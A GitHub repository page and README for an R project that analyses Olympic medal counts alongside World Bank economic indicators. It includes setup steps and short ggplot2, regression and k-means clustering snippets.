https://github.com/synth001/olympic-medal-data-analysis
🥇 A project for analyzing Olympic medal data with R, combining TidyTuesday records and World Bank indicators to assess raw medal counts, efficiency metrics, and economic context. It generates diverse visualizations, performs regression and clustering, and reveals patterns in national Olympic performance.
- Host: GitHub
- URL: https://github.com/synth001/olympic-medal-data-analysis
- Owner: synth001
- License: mit
- Created: 2025-05-11T00:35:05.000Z
- Default Branch: master
- Last Pushed: 2025-05-12T23:29:34.000Z
- Last Synced: 2025-05-13T00:55:10.454Z
- Topics: analytics, dataanalysis, docker, excel, formula1, latex, matplotlib, microsoftexcel, olympics, olympics-medals, pandas, pivot-tables, plotly, rprogramming
- Language: R
- Size: 683 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
- License: LICENSE
# Olympic Medal Data Analysis 🥇
Welcome to the Olympic Medal Data Analysis project! This repository focuses on analyzing Olympic medal data using R. By combining TidyTuesday records with World Bank indicators, we assess raw medal counts, efficiency metrics, and the economic context surrounding Olympic performance.
## Table of Contents
- [Introduction](#introduction)
- [Project Overview](#project-overview)
- [Data Sources](#data-sources)
- [Features](#features)
- [Getting Started](#getting-started)
- [Usage](#usage)
- [Visualizations](#visualizations)
- [Regression and Clustering](#regression-and-clustering)
- [Contributing](#contributing)
- [License](#license)
- [Acknowledgments](#acknowledgments)
## Introduction
The Olympic Games serve as a global stage for athletic excellence. This project aims to delve into the data behind these events, providing insights into how countries perform and what factors influence their success.
## Project Overview
This project integrates data from TidyTuesday and World Bank indicators to explore several key areas:
- Raw medal counts for different countries.
- Efficiency metrics that evaluate how effectively countries convert resources into medals.
- Economic context that provides background on the countries' performances.
Using R, we build visualizations and statistical models that reveal patterns and trends in Olympic performance over the years.
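The efficiency metrics above can be illustrated with a minimal base-R sketch. It assumes a data frame with hypothetical columns `country`, `total_medals`, `population` and `gdp_usd` (GDP in current US dollars); the values are invented toy numbers, not real results, and the project's own metric definitions may differ.

```r
# Toy data for illustration only; these are NOT real medal or World Bank figures.
# Column names (country, total_medals, population, gdp_usd) are hypothetical.
medals <- data.frame(
  country      = c("A", "B", "C"),
  total_medals = c(100, 20, 5),
  population   = c(300e6, 10e6, 1e6),
  gdp_usd      = c(20e12, 500e9, 20e9),
  stringsAsFactors = FALSE
)

# Medals per million inhabitants: favours small countries that win a lot
medals$medals_per_million <- medals$total_medals / (medals$population / 1e6)

# Medals per US$100 billion of GDP: a rough "economic efficiency" ratio
medals$medals_per_100bn_gdp <- medals$total_medals / (medals$gdp_usd / 100e9)

# Rank countries by per-capita efficiency (highest first)
medals[order(-medals$medals_per_million), c("country", "medals_per_million")]
```

Per-capita and per-GDP ratios can rank countries very differently from raw counts, which is why it helps to report them side by side.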
## Data Sources
The primary data sources for this project include:
- **TidyTuesday**: A weekly data project that provides datasets for analysis.
- **World Bank Indicators**: Economic data that gives context to Olympic performance.
We clean and preprocess this data to ensure it is ready for analysis.
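One common preprocessing step is joining the medal table to the World Bank indicators. The sketch below is a hypothetical illustration, not the project's actual cleaning script: it assumes medals are keyed by IOC code (column `noc`) and indicators by ISO 3166-1 alpha-3 code (column `iso3c`), with toy values. The two code systems disagree for some countries (Germany is `GER` for the IOC but `DEU` in ISO 3166), so a small mapping is applied before the join.

```r
# Hypothetical medal table keyed by IOC country code (toy values)
medals <- data.frame(
  noc          = c("GER", "NED", "USA"),
  total_medals = c(10, 8, 30),
  stringsAsFactors = FALSE
)

# Hypothetical World Bank extract keyed by ISO 3166-1 alpha-3 code (toy values)
wb <- data.frame(
  iso3c          = c("DEU", "NLD", "USA"),
  gdp_per_capita = c(50000, 55000, 70000),
  stringsAsFactors = FALSE
)

# IOC and ISO codes differ for some countries, so map them explicitly.
# Only the codes needed for this toy example are listed.
ioc_to_iso <- c(GER = "DEU", NED = "NLD")
medals$iso3c <- medals$noc
needs_map <- medals$noc %in% names(ioc_to_iso)
medals$iso3c[needs_map] <- ioc_to_iso[medals$noc[needs_map]]

# Left join: keep every medal row even if no economic data matches
combined <- merge(medals, wb, by = "iso3c", all.x = TRUE)

# Collect codes that failed to match so they can be inspected, not silently lost
unmatched <- combined$noc[is.na(combined$gdp_per_capita)]
```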
## Features
This project includes several key features:
- **Data Cleaning**: Scripts to clean and preprocess raw data.
- **Visualizations**: A variety of charts and graphs to illustrate findings.
- **Statistical Analysis**: Regression and clustering methods to identify patterns.
- **Economic Context**: Analysis of how economic factors relate to Olympic success.
## Getting Started
To get started with this project, you need to clone the repository and install the required packages.
### Prerequisites
Make sure you have R and RStudio installed on your machine. You will also need the following R packages:
- tidyverse
- ggplot2
- dplyr
- readr
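- tidyr

ggplot2, dplyr, readr, and tidyr are core tidyverse packages, so installing `tidyverse` also installs them.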
### Installation
Clone the repository:
```bash
git clone https://github.com/synth001/olympic-medal-data-analysis.git
```
Navigate to the project directory:
```bash
cd olympic-medal-data-analysis
```
Install the required packages:
```R
install.packages(c("tidyverse", "ggplot2", "dplyr", "readr", "tidyr"))
```
## Usage
Once you have installed the required packages, you can run the analysis scripts. The main script to start with is `analysis.R`. This script will load the data, perform the necessary analysis, and generate visualizations.
Run the script in RStudio:
```R
source("analysis.R")
```
This will execute the analysis and produce the visualizations in your RStudio environment.
## Visualizations
Visualizations are a critical part of this project. They help convey complex data in an understandable way. We create various types of charts, including:
- **Bar Charts**: To display the total number of medals won by each country.
- **Line Graphs**: To show trends in Olympic performance over time.
- **Heat Maps**: To visualize the efficiency of countries in converting resources to medals.
Here’s an example of a bar chart that displays the total medal counts:
```R
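library(ggplot2)

# `data` is assumed to be a data frame with one row per country and
# columns `country` and `total_medals`
ggplot(data, aes(x = country, y = total_medals)) +
  geom_col() +  # same as geom_bar(stat = "identity"): bar height = total_medals
  theme_minimal() +
  labs(title = "Total Olympic Medals by Country", x = "Country", y = "Total Medals")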
```
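A line graph of trends over time follows the same ggplot2 pattern. This is a sketch on invented toy data; the `trend` data frame and its `year`, `country` and `total_medals` columns are assumptions for illustration, not the project's actual variables.

```r
library(ggplot2)

# Toy panel data for illustration only (not real results);
# the columns year, country and total_medals are hypothetical
trend <- data.frame(
  year         = rep(c(2012, 2016, 2020), times = 2),
  country      = rep(c("A", "B"), each = 3),
  total_medals = c(10, 14, 12, 5, 7, 11),
  stringsAsFactors = FALSE
)

# One coloured line per country, with points marking each Games
p <- ggplot(trend, aes(x = year, y = total_medals, colour = country)) +
  geom_line() +
  geom_point() +
  scale_x_continuous(breaks = unique(trend$year)) +
  theme_minimal() +
  labs(title = "Olympic Medals over Time", x = "Year",
       y = "Total Medals", colour = "Country")

print(p)
```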
## Regression and Clustering
We apply regression analysis to quantify the relationship between economic indicators and medal counts. This helps identify which indicators are most strongly associated with Olympic success.
### Regression Analysis
We use linear regression to model the relationship between GDP per capita and the number of medals won. The following code snippet illustrates this:
```R
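# `data` is assumed to hold one row per country with numeric columns
# `total_medals` and `gdp_per_capita`
model <- lm(total_medals ~ gdp_per_capita, data = data)
summary(model)  # coefficients, standard errors, p-values and R-squared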
```
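Because several indicators may matter at once, the single-predictor model can be extended to multiple regression. The sketch below runs on simulated data (the `sim` data frame and its columns are hypothetical, and the generating coefficients are arbitrary) and log-transforms GDP per capita and population, since both are strongly right-skewed across countries.

```r
# Simulated data for illustration only; coefficients used to generate it are arbitrary
set.seed(42)
n <- 50
sim <- data.frame(
  gdp_per_capita = exp(runif(n, log(1000), log(80000))),
  population     = exp(runif(n, log(1e6), log(1e9)))
)
sim$total_medals <- round(pmax(0, -60 + 4 * log(sim$gdp_per_capita) +
                                 2 * log(sim$population) + rnorm(n, sd = 5)))

# Fit both predictors on the log scale to tame their skew
model_multi <- lm(total_medals ~ log(gdp_per_capita) + log(population), data = sim)
summary(model_multi)

# Coefficient table: estimate, standard error, t value and p-value per predictor
coef(summary(model_multi))
```

Medal counts are non-negative integers, so a count model such as `glm(..., family = poisson)` is a common alternative to `lm()` for this kind of outcome.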
### Clustering Analysis
Clustering groups countries with similar performance metrics. We use k-means clustering for this purpose. Here’s how to implement it:
```R
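set.seed(123)  # make the random k-means starts reproducible
# Standardise both columns so GDP per capita (in dollars) does not dominate the distances;
# kmeans() also assumes there are no missing values in these columns
features <- scale(data[, c("total_medals", "gdp_per_capita")])
clusters <- kmeans(features, centers = 3, nstart = 25)
data$cluster <- clusters$cluster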
```
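The choice of `centers = 3` can be checked with the elbow heuristic: fit k-means for a range of k and look for the point where the total within-cluster sum of squares stops falling sharply. This sketch uses simulated, standardised data with hypothetical column names; with the project's data, `features` would instead be the scaled medal and GDP columns.

```r
# Simulated two-feature data with three loose groups, for illustration only
set.seed(123)
sim <- data.frame(
  total_medals   = c(rnorm(20, 5, 2), rnorm(20, 40, 5), rnorm(20, 100, 10)),
  gdp_per_capita = c(rnorm(20, 5000, 1000), rnorm(20, 30000, 4000),
                     rnorm(20, 60000, 5000))
)
features <- scale(sim)  # standardise so both columns contribute equally

# Total within-cluster sum of squares for k = 1..6;
# nstart = 25 keeps the best of 25 random initialisations per k
wss <- sapply(1:6, function(k) kmeans(features, centers = k, nstart = 25)$tot.withinss)

plot(1:6, wss, type = "b", xlab = "Number of clusters k",
     ylab = "Total within-cluster sum of squares", main = "Elbow plot")
```

The elbow is only a heuristic; average silhouette width (for example via `cluster::silhouette()`) is another common way to compare values of k.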
## Contributing
We welcome contributions to this project. If you have suggestions or improvements, please follow these steps:
1. Fork the repository.
2. Create a new branch for your feature or bug fix.
3. Make your changes and commit them.
4. Push your branch to your fork.
5. Create a pull request.
## License
This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for more information.
## Acknowledgments
We thank the TidyTuesday community for providing valuable datasets. Their efforts help promote data analysis and visualization skills across various domains.
For further details and updates, see the repository's [Releases page](https://github.com/synth001/olympic-medal-data-analysis/releases).
Happy analyzing!